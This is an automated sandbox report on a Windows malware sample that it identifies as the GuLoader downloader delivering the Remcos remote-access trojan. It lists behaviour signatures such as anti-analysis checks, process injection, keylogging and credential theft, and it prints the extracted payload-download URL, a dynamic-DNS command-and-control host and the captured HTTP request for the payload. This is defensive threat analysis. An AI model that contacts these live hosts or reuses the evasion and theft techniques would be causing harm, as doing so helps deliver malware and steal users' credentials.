Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report loKmeabs9V.exe

Overview

General Information

Sample Name:loKmeabs9V.exe
Analysis ID:457916
MD5:e0d74762f123eb6603898d1482eb9752
SHA1:ee63af5c34a027ba8b8331dd678b15e7a87d26a6
SHA256:f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
Tags:exeRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loKmeabs9V.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
    • loKmeabs9V.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 3576 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 484 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 4112 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny' MD5: E0D74762F123EB6603898D1482EB9752)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeVirustotal: Detection: 20%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeReversingLabs: Detection: 13%
      Multi AV Scanner detection for submitted fileShow sources
      Source: loKmeabs9V.exeVirustotal: Detection: 20%Perma Link
      Source: loKmeabs9V.exeReversingLabs: Detection: 13%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: loKmeabs9V.exeJoe Sandbox ML: detected
      Source: 22.0.loKmeabs9V.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,22_2_00404423
      Source: loKmeabs9V.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407898
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407C87

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: wealthyrem.ddns.net
      Source: global trafficTCP traffic: 192.168.2.3:49735 -> 194.5.97.128:39200
      Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
      Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exe, 00000016.00000003.470302046.0000000000A0D000.00000004.00000001.sdmpString found in binary or memory: ersion":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version informati equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
      Source: loKmeabs9V.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
      Source: unknownDNS traffic detected: queries for: wealthyrem.ddns.net
      Source: loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: loKmeabs9V.exeString found in binary or memory: http://www.ebuddy.com
      Source: loKmeabs9V.exeString found in binary or memory: http://www.imvu.com
      Source: loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com/.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
      Source: loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
      Source: loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
      Source: loKmeabs9V.exeString found in binary or memory: https://login.yahoo.com/config/login
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
      Source: loKmeabs9V.exeString found in binary or memory: https://www.google.com
      Source: loKmeabs9V.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\loKmeabs9V.exeJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041183A OpenClipboard,GetLastError,DeleteFileW,22_2_0041183A

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B629C NtWriteVirtualMemory,LoadLibraryA,0_2_022B629C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5971 NtAllocateVirtualMemory,0_2_022B5971
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9189 NtProtectVirtualMemory,0_2_022B9189
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4230 NtWriteVirtualMemory,0_2_022B4230
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7C19 NtWriteVirtualMemory,0_2_022B7C19
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5844 NtWriteVirtualMemory,0_2_022B5844
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9653 NtWriteVirtualMemory,CreateProcessInternalW,0_2_022B9653
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B46C8 NtWriteVirtualMemory,0_2_022B46C8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4CD0 NtWriteVirtualMemory,0_2_022B4CD0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9122 NtProtectVirtualMemory,0_2_022B9122
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4352 NtWriteVirtualMemory,0_2_022B4352
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41B6 NtWriteVirtualMemory,0_2_022B41B6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4B96 NtWriteVirtualMemory,0_2_022B4B96
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 NtWriteVirtualMemory,0_2_022B87E3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569CF6 LdrInitializeThunk,NtProtectVirtualMemory,14_2_00569CF6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569DCF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,14_2_00569DCF
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569CF1 LdrInitializeThunk,NtProtectVirtualMemory,14_2_00569CF1
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00401806 NtdllDefWindowProc_W,22_2_00401806
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004018C0 NtdllDefWindowProc_W,22_2_004018C0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402CAC NtdllDefWindowProc_A,23_2_00402CAC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402D66 NtdllDefWindowProc_A,23_2_00402D66
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004016FC NtdllDefWindowProc_A,24_2_004016FC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004017B6 NtdllDefWindowProc_A,24_2_004017B6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B245A0_2_022B245A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B86870_2_022B8687
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B629C0_2_022B629C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B59710_2_022B5971
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B05710_2_022B0571
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0BC70_2_022B0BC7
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3A2E0_2_022B3A2E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B80300_2_022B8030
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B42300_2_022B4230
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7C190_2_022B7C19
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B084F0_2_022B084F
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B58440_2_022B5844
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B96530_2_022B9653
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B16540_2_022B1654
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0CAC0_2_022B0CAC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B30BC0_2_022B30BC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B28890_2_022B2889
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B80980_2_022B8098
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3C9E0_2_022B3C9E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B149C0_2_022B149C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B2C930_2_022B2C93
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B82940_2_022B8294
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3EE10_2_022B3EE1
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B10E00_2_022B10E0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B46C80_2_022B46C8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C30_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B82DC0_2_022B82DC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4CD00_2_022B4CD0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B89230_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B79210_2_022B7921
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B83240_2_022B8324
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B151C0_2_022B151C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B19400_2_022B1940
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B1D5A0_2_022B1D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B43520_2_022B4352
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5DAE0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41B60_2_022B41B6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4B960_2_022B4B96
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E30_2_022B87E3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41E60_2_022B41E6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5BF30_2_022B5BF3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B19F40_2_022B19F4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E99D1E714_3_1E99D1E7
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1EA3B48714_3_1EA3B487
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E79FBBE14_3_1E79FBBE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E80D21E14_3_1E80D21E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E8491EC14_3_1E8491EC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7AE75514_3_1E7AE755
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7DBB8C14_3_1E7DBB8C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E81BDB514_3_1E81BDB5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7A064D14_3_1E7A064D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B04022_2_0044B040
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0043610D22_2_0043610D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044731022_2_00447310
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044A49022_2_0044A490
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040755A22_2_0040755A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0043C56022_2_0043C560
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B61022_2_0044B610
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044D6C022_2_0044D6C0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004476F022_2_004476F0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B87022_2_0044B870
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044081D22_2_0044081D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041495722_2_00414957
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004079EE22_2_004079EE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00407AEB22_2_00407AEB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044AA8022_2_0044AA80
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00412AA922_2_00412AA9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404B7422_2_00404B74
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404B0322_2_00404B03
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044BBD822_2_0044BBD8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404BE522_2_00404BE5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404C7622_2_00404C76
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00415CFE22_2_00415CFE
